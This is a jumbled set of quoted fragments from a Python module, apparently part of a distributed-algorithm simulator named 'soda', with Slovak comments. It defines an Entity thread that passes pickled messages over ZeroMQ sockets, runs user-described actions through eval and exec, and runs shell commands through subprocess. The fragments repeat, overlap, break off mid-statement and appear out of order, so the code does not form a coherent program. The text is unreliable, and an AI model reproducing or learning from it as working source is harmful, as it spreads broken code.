stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type if _output_type ==", "_self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock", "False # Nastavíme _n na prvý uzol správania príslušného pre aktuálny stav. _n", "{1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output,", "{0} | Action: EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression))", "| From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý", "Aby mala funkcia exec() prístup ku všetkým lokálnym # premenným entity, ktoré používateľ", "je nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v", "_self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} |", "= _ip _self._in_port = _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors =", "exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value!", "correct output type if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout +", "-> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME |", "\"Entity: {0} | Action: EXEC | Wrong value for output cast to float!", "= (_message, ) # Ak je prijímateľ iba jeden pretypujeme ho na pole.", "is tuple: _identifier, _ = _i if type(_j) is str: _j = \"'\"", "to send message to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def", "entity, ktoré používateľ opísal v algoritme je nutné predať funkcii # exec() prostredníctvom", "and type(_i) is not tuple: _result.append(True) elif _i != _j and type(_i) is", "def pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions", "odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ |", "akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER", "\".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined", "exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type", "ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression))", "vzore nieje na poziícii premenná # uložíme si do premennej _result hodnotu True.", "elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info(", "Wrong value for output cast to float! -> {1} -> {2} \".format(_self._id, _Value,", "# a vo vzore nie je na pozícii premenná úložíme hodnotu False. Pre", "import dumps, loads from logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior", "\"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop }", "dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a", "entitu o 1. for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" %", "pretypujeme ho na pole. if type(_recipients) is int: _recipients = [_recipients] * 1", "_sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre # aktuálny", "= _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages =", "neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to send message", "evaluate(_expression): result = None try: result = eval(_expression, {}, _self.__dict__) except NameError as", "| Action: READ | Message : {1} | From entity : {2} \".format(_self._id,", "_output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command,", "% (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become,", "state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na nový.", "| Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError", "\".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression):", "[18]. Následne # odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet #", "universal_newlines=True, shell=True) # cast to correct output type if _output_type == 'string': _process_output", "_process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC", "= _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages = 0 _context =", "_self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom. Ak je na rovnakej", "deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states,", "entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER =", "ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression))", "except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of", "exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom # sú uchované všetky", "{2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action:", "Action: ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Type,", "False. Pre pozície # kde je vo vzore premenná si uložíme hodnotu None.", "_completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError", "%s\" % (_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) #", "argumenty atribút objektu __dict__, v ktorom # sú uchované všetky aktuálne referencie premenných", "V nekonečnom cykle sledujeme, či na soket prišla správa. while True: _socks =", "= %s\" % (_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, ))", "logiku uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie. if type(_n)", "| Action: BECOME | Old state : {1} | New state : {2}", "_received_message): if _i == _j and type(_i) is not tuple: _result.append(True) elif _i", "správy. if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action:", "= _i if type(_j) is str: _j = \"'\" + _j + \"'\"", "a vo vzore nieje na poziícii premenná # uložíme si do premennej _result", "aby sme mohli následne v metóde run() identifikovať # správanie príslušné tomuto vzoru.", "_out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa", "_self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log,", "Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock", "_pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme", "Action: EXEC | Wrong value for output cast to int! -> {1} ->", "pre entitu o 1. for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\"", ": {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného", "a samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message : {1} |", "ktorá je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek", "iba jeden pretypujeme ho na pole. if type(_recipients) is int: _recipients = [_recipients]", "# Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná", "_Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! -> {1} -> {2}", "to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s", "prijali aby sme mohli následne v metóde run() identifikovať # správanie príslušné tomuto", "TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier!", "if False not in _result: # Pre pozície kde je vo vzore premenná", "poli _result nie je hodnota False znamená to, že prijatá správa # sa", "DEALER from threading import Thread from pickle import dumps, loads from logging import", "-> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} |", "na nový. _self._state = _new_state # Ak je tento nový stav terminujúci tak", "= _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours =", "{2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ konštrukcií", "_socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu", "\".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state", "príkaz. Príkaz, ktorý ma exec vykonať je definovaný # reťazcom _expression. Aby mala", "zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ = _i if type(_j) is", "message to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity:", "= split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True,", "_self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len", "_p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom.", "Ak je prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients) is int:", "@support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state : {1}", "EXEC | Wrong value for output cast to float! -> {1} -> {2}", "_Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! -> {1}", "_j + \"'\" _expression = \"%s = %s\" % (_identifier, _j) # Využijeme", "| To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError:", "Správu prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message,", "akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný # reťazcom", "reťazcom _expression. Aby mala funkcia exec() prístup ku všetkým lokálnym # premenným entity,", "4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode:", "def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state : {1} |", "pozície # kde je vo vzore premenná si uložíme hodnotu None. if len(_pattern[1])", "je na pozícii premenná úložíme hodnotu False. Pre pozície # kde je vo", "_logger.info( \"Entity: {0} | Action: EXEC | Wrong value for output cast to", "read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute,", "import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess", "{0} | Action: ASSIGN | Wrong type of identifier! -> {1} -> {2}", "sa zhoduje so vzorom. if False not in _result: # Pre pozície kde", "_expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression =", "stavu. while _self._state not in _self._term_states: _current_state = _self._state # Entita sa spustí", "_self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID =", "False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else:", "# Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to", "1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND", "valídny Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný # reťazcom _expression.", "AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of identifier!", "= _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý uzol správania príslušného", "a zvýšíme počet # odoslaných správ pre entitu o 1. for _n in", "spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre entitu o", "Entita zmení svoj stav na nový. _self._state = _new_state # Ak je tento", "používateľ opísal v algoritme je nutné predať funkcii # exec() prostredníctvom tretieho argumenty", "None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output", "\"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita vykonáva správanie pokiaľ sa", "opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self)", "= Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in", "Action: ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit()", "def evaluate(_expression): result = None try: result = eval(_expression, {}, _self.__dict__) except NameError", "if _i == _j and type(_i) is not tuple: _result.append(True) elif _i !=", "Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state not in", "Vykonáme logiku uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie. if", "add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value):", "\".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme", "terminujúceho stavu. while _self._state not in _self._term_states: _current_state = _self._state # Entita sa", "_process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC", "% (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\"", "_process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output", "_expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression =", "= _self._state # Entita sa spustí impulzom alebo začne čítať prijaté správy. if", "remove, \"POP\": pop } def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane", "type if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif", "_logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id,", "= deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom cykle sledujeme, či", "správanie. while _n is not None: # Vykonáme logiku uzlu. Logika uzlov je", "_sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message : {1} | From entity", "= \"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output =", "_output): _expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = {", "as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! ->", "@support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(),", "\".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,))", "na prvý uzol správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node =", "_j = \"'\" + _j + \"'\" _expression = \"%s = %s\" %", "_completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def", "{2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so správou,", "type(_j) is str: _j = \"'\" + _j + \"'\" _expression = \"%s", "sa spustí impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse = False", "send message to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state):", "_self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je", "funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom # sú", "_Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments", "vo vzore premenná uložíme hodnotu z príslušnej # pozície v správe do tejto", "= False _self._read_lock = False _self._count_sent_messages = 0 _context = Context() _self._in_socket =", "% (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array,", "-> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output,", "\"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita", "správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state not in _self._term_states: _current_state", "pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie.", "{1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0}", "Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action:", "nezhodujú # a vo vzore nie je na pozícii premenná úložíme hodnotu False.", "# prijali aby sme mohli následne v metóde run() identifikovať # správanie príslušné", "len def read(): # V nekonečnom cykle sledujeme, či na soket prišla správa.", "ActionNode, IfNode from subprocess import run, PIPE from shlex import split from copy", "is str: _j = \"'\" + _j + \"'\" _expression = \"%s =", "of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as", "EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result", "Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node", "\".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre", "Ak je tento nový stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states:", "prístup ku všetkým lokálnym # premenným entity, ktoré používateľ opísal v algoritme je", "Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme", "tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier,", "-> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity:", "| Action: SEND | Message : {1} | To entity : {2} \".format(_self._id,", "_expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong", "prijaté správy. if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} |", "if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started", "type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak v v poli _result", "a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN |", "True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý uzol", "je opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node =", "+ \"'\" _expression = \"%s = %s\" % (_identifier, _j) # Využijeme akciu", "_self._read_lock = False _self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\"", "a vo vzore nie je na pozícii premenná úložíme hodnotu False. Pre pozície", "a # prijatej správe tá istá hodnota a vo vzore nieje na poziícii", "_logger.info(\"Entity: {0} | Action: READ | Message : {1} | From entity :", "Trying to send message to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments", "_term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port = _in_port", "SEND | Trying to send message to non existing neighbour! -> {1} \".format(_self._id,", "\"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression =", "správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme", "Ak je na rovnakej pozícii vo vzore a # prijatej správe tá istá", "prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients", "remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output):", "sa nedostane do terminujúceho stavu. while _self._state not in _self._term_states: _current_state = _self._state", "Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode:", "uchované všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity:", "except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of", "def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v", "{1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output", "\".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania správy.", "is not tuple: _message = (_message, ) # Ak je prijímateľ iba jeden", "pokiaľ sa nedostane do terminujúceho stavu. while _self._state not in _self._term_states: _current_state =", "as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong value for output", "úložíme hodnotu False. Pre pozície # kde je vo vzore premenná si uložíme", "ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie", "= _id _self._ip = _ip _self._in_port = _in_port _self._state = _state _self._term_states =", "result = eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action:", "odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED", "_out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) #", "_j and type(_i) is not tuple: _result.append(True) elif _i != _j and type(_i)", "except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of", "odosieľatela a zvýšíme počet # odoslaných správ pre entitu o 1. for _n", "{2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" % (_output, _process_output)", "správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu", "to non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0}", "_Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command)", "tuple: _identifier, _ = _i if type(_j) is str: _j = \"'\" +", "type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self)", "try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action:", "cast to correct output type if _output_type == 'string': _process_output = \"'\" +", "% (_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme", "is int: _recipients = [_recipients] * 1 # Pre každého prijímateľa vytvoríme nový", "_self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier!", "as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! -> {1} ->", "tento nový stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit() @support_arguments", "_Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of identifier! -> {1}", "= _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock =", "_self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for", "@support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme napríklad", "_output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity:", "float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong", "je hodnota False znamená to, že prijatá správa # sa zhoduje so vzorom.", "tá istá hodnota a vo vzore nieje na poziícii premenná # uložíme si", "# Správu prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT)", "SEND | Message : {1} | To entity : {2} \".format(_self._id, _message, _n))", "_Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN |", "in _result: # Pre pozície kde je vo vzore premenná uložíme hodnotu z", "uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), # ktorá je jednou zo", "identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type:", "= run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type if", "\".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE", "entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie", "import Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from pickle import", "loads from logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode,", "_message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity:", "== 'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0}", "exec(), # ktorá je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať", "je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action: SEND", "# sú uchované všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {},", "_behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý uzol správania", "tuple: _result.append(False) else: _result.append(None) # Ak v v poli _result nie je hodnota", "{1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0}", "_self._state, _new_state)) # Entita zmení svoj stav na nový. _self._state = _new_state #", "'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} |", "cez správanie. while _n is not None: # Vykonáme logiku uzlu. Logika uzlov", "{2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action:", "= loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1} | From", "{1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN |", "# exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom # sú uchované", "mohli následne v metóde run() identifikovať # správanie príslušné tomuto vzoru. return _pattern", "správu spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre entitu", "import split from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self,", "% (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array,", "zhoduje so vzorom. if False not in _result: # Pre pozície kde je", "{0} | Action: BECOME | Old state : {1} | New state :", "\".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output, _input): _command =", "From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa", "prijímateľa vytvoríme nový soket typu DEALER [18]. Následne # odošleme správu spolu s", "int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong", "_n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): # V", "IfNode from subprocess import run, PIPE from shlex import split from copy import", "type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError", "vzore premenná si uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for _i, _j", "_Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE |", "vo vzore nie je na pozícii premenná úložíme hodnotu False. Pre pozície #", "dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať je", "{1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" +", "Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from pickle import dumps,", "Wrong value for output cast to int! -> {1} -> {2} \".format(_self._id, _Value,", "_value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression", "try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message =", "Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID", "_Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong value for output cast", "pop } def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho", "_logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of identifier! -> {1} ->", ": {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na nový. _self._state", "_self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments", "for _i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ =", "odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message :", "_Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! -> {1} -> {2}", "# Nastavíme _n na 